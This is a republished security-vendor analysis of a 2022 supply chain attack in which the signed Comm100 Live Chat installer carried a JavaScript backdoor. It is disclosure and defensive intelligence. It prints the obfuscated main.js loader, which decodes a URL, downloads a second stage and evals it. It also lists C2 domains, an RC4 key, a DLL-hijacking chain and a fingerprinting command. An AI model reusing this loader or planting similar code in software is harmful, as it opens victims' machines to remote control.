Cloud 101CircleEventsBlog
Master CSA’s Security, Trust, Assurance, and Risk program—download the STAR Prep Kit for essential tools to enhance your assurance!

Supply Chain Attack via a Trojanized Comm100 Chat Installer

Published 11/02/2022

Supply Chain Attack via a Trojanized Comm100 Chat Installer

Originally published by CrowdStrike.

  • Leveraging a combination of advanced machine learning and artificial intelligence, a new supply chain attack was identified during the installation of a chat-based customer engagement platform.
  • The supply chain attack involved a trojanized installer for the Comm100 Live Chat application being deployed.
  • Malware was delivered via a signed Comm100 installer that could be downloaded from the company’s website as recently as the morning of September 29, 2022.
  • With moderate confidence, the actor responsible for this activity likely has a China nexus.
  • Based on responsible disclosure, Comm100 has released an updated installer (10.0.9) that can be downloaded here.

Applying a combination of advanced machine learning (ML), artificial intelligence (AI) and deep analytics across the trillions of security events captured, a leading security company identified a new supply chain attack pattern during the installation of a chat based customer engagement platform.

The company confirmed that the supply chain attack involved a trojanized installer for the Comm100 Live Chat application. This attack occurred from at least September 27, 2022 through the morning of September 29, 2022. The trojanized file was identified at organizations in the industrial, healthcare, technology, manufacturing, insurance and telecommunications sectors in North America and Europe.

Attack Details

Malware is delivered via a signed Comm100 installer that was downloadable from the company’s website. The installer was signed on September 26, 2022 at 14:54:00 UTC using a valid Comm100 Network Corporation certificate.

The security company confirmed that the Microsoft Windows 7+ desktop agent hosted at https[:]//dash11.comm100[.]io/livechat/electron/10000/Comm100LiveChat-Setup-win.exe that was available until the morning of September 29 was a trojanized installer. Comm100 has since released an updated installer (10.0.9).

This installer (SHA256 hash: ac5c0823d623a7999f0db345611084e0a494770c3d6dd5feeba4199deee82b86) is an Electron application that contains a JavaScript (JS) backdoor within the file main.js of the embedded Asar archive.

(function(){if(!(typeof Buffer==="undefined")){require("http").get((function(){let b=Buffer.from('681c6818220d2243335a74157819630c620374077510600c6d143a59365b74187107620a6f03735c3f503c50355622','hex');
for(i=b.length-1;i>0;i--){b[i]=b[i]^b[i-1]}return b.toString();})(),function(resp){let data="";resp.on("data",chunk=>{data+=chunk;});resp.on("end",()=>{try{eval(data)}catch(e){}});resp.on("error",err=>{})}).on("error",err=>{})}})()

Figure 1. Initial JS Backdoor in main.js

The backdoor downloads and executes a second-stage script from URL http[:]//api.amazonawsreplay[.]com/livehelp/collect.

The second-stage script consists of obfuscated JS containing a backdoor that gathers host information before providing the actor with remote shell functionality by spawning a new instance of cmd.exe.

The script also uses the command-and-control (C2) domain api.amazonawsreplay[.]com.

As part of likely follow-on activity, the actor installed additional malicious files on the affected host, including a malicious loader DLL named MidlrtMd.dll executed by a legitimate copy of a Microsoft Metadata Merge Utility (mdmerge.exe) binary via DLL search-order hijacking. The loader DLL decrypts a payload file named license using a customized variant of RC4 encryption with the hard-coded key U9ELetx8eMR8pd5koFamoOyuf9tTRTPG.

The decrypted payload consists of shellcode that is executed in memory and injects an embedded payload into a new instance of notepad.exe. The injected payload connects to the malicious C2 domain api.microsoftfileapis[.]com, which resolved to the IP address 8.219.167[.]156 at the time of the incident.

Based on the company’s responsible disclosure, Comm100 has released an updated installer. Impacted Comm100 customers can download the latest exe version (10.0.9) here.

Comm100 further indicated it was performing a root cause analysis to obtain additional information.

Assessment

The payload delivered in this supply chain attack differs from payloads identified in previous incidents related to the same actor, targeting online gambling entities in Asia. Additionally, the recent activity differs from activity targeting online gambling in both the target scope and the supply chain attack mechanism delivering a trojanized app via Comm100’s website.

Despite these differences, the company assesses that the actor responsible for previously identified online gambling targeting is also likely responsible for these recent incidents. This assessment is made with moderate confidence based on the following factors:

  • The use of chat software to deliver malware
  • The use of the Microsoft Metadata Merge Utility binary to load a malicious DLL named MidlrtMd.dll
  • C2 domain-naming convention using Microsoft and Amazon-themed domains along with api. subdomains
  • C2 domains hosted on Alibaba infrastructure

Furthermore, with moderate confidence, this actor likely has a China nexus. This assessment is based on the presence of Chinese-language comments in the malware, aforementioned tactics, techniques and procedures (TTPs), and the connection to the targeting of online gambling entities in East and Southeast Asia — a previously established area of focus for China-nexus targeted intrusion actors.

Intelligence Confidence Assessment

High Confidence: Judgments are based on high-quality information from multiple sources. High confidence in the quality and quantity of source information supporting a judgment does not imply that that assessment is an absolute certainty or fact. The judgment still has a marginal probability of being inaccurate.

Moderate Confidence: Judgments are based on information that is credibly sourced and plausible, but not of sufficient quantity or corroborated sufficiently to warrant a higher level of confidence. This level of confidence is used to express that judgments carry an increased probability of being incorrect until more information is available or corroborated.

Low Confidence: Judgments are made where the credibility of the source is uncertain, the information is too fragmented or poorly corroborated enough to make solid analytic inferences, or the reliability of the source is untested. Further information is needed for corroboration of the information or to fill known intelligence gaps.

Indicators

SHA256 Hash

Comm100 File Version

6f0fae95f5637710d1464b42ba49f9533443181262f78805d3ff13bea3b8fd45

(This file contains the same backdoor, but it has not been observed in the wild)

10.0.72

ac5c0823d623a7999f0db345611084e0a494770c3d6dd5feeba4199deee82b86

10.0.8

Table 1. Trojanized Comm100 Application Executables

Filename

SHA256 Hash

Description

C:\ProgramData\Cisco Core\CoreConnect.exe

ac9f2ae9de5126691b9391c990f9d4f1c25afa912fbfda2d4abfe9f9057bdd8c

Legitimate mdmerge.exe executable

C:\ProgramData\Cisco Core\MidlrtMd.dll

6194d57fc3bc35acf9365b764338adefacecfacf5955b87ad6a5b753fb6081f8

Malicious loader DLL

C:\ProgramData\Cisco Core\license

c930a28878a5dd49f7c8856473ff452ddbdab8099acd6900047d9b3c6e88edca

Encrypted payload configured with C2 domain api.microsoftfileapis[.]com

Table 2. Observed Implant Likely Deployed by the Actor

Network Indicators

Description

http[:]//api.amazonawsreplay[.]com/collect_log

JS backdoor logging URL

http[:]//api.amazonawsreplay[.]com

JS backdoor C2

http[:]//api.amazonawsreplay[.]com/livehelp/init

JS backdoor C2

http[:]//api.microsoftfileapis[.]com

Encrypted payload C2 host

https[:]//selfhelp[.]windowstearns[.]com

Related encrypted payload C2 host

http[:]//api.amazonawsreplay[.]com/livehelp/collect

Staging URL for JS backdoor

Table 3. Network Indicators Related to Activity Described in this Alert

Command Line

Description

reg query \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" /v ProductId

Used in the JS backdoor to compute a MD5 victim hash

Table 4. Command-Line Indicators Related to Activity Described in this Alert

Share this content on your favorite social network today!